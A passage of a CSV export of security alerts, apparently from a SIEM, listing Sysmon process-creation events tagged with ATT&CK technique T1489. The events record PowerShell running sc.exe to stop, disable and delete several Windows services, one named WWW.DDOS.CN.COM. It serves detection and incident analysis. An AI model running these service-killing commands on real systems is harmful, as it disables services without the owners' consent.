-NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete AxInstSV",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.749533000Z"",""eventRecordID"":""3504"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.747\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010b09b2e00}\r\nProcessId: 5624\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete AxInstSV\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.747"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010b09b2e00}"",""processId"":""5624"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete AxInstSV"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.655",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.734 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010d39a2e00} +ProcessId: 4032 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop AxInstSV +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.738353000Z"",""eventRecordID"":""3503"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.734\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010d39a2e00}\r\nProcessId: 4032\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.734"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010d39a2e00}"",""processId"":""4032"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop AxInstSV"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.448",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.687 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00102c982e00} +ProcessId: 7396 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop clr_optimization +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.689334400Z"",""eventRecordID"":""3500"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.687\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00102c982e00}\r\nProcessId: 7396\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.687"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-00102c982e00}"",""processId"":""7396"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop clr_optimization"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.309",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.644 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010bd952e00} +ProcessId: 748 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop aspnet_staters +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.647762800Z"",""eventRecordID"":""3497"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.644\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010bd952e00}\r\nProcessId: 748\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.644"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010bd952e00}"",""processId"":""748"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop aspnet_staters"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.247",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.623 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010c9942e00} +ProcessId: 3992 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config aspnet_staters Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config aspnet_staters Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.625873000Z"",""eventRecordID"":""3496"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.623\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010c9942e00}\r\nProcessId: 3992\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config aspnet_staters Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.623"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010c9942e00}"",""processId"":""3992"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config aspnet_staters Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.226",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.573 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010b5922e00} +ProcessId: 5196 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelpSvcs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.575596500Z"",""eventRecordID"":""3494"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.573\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010b5922e00}\r\nProcessId: 5196\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.573"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010b5922e00}"",""processId"":""5196"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelpSvcs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.154",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.483 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00109c8f2e00} +ProcessId: 1700 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WWW.DDOS.CN.COM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.486270000Z"",""eventRecordID"":""3491"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.483\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00109c8f2e00}\r\nProcessId: 1700\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 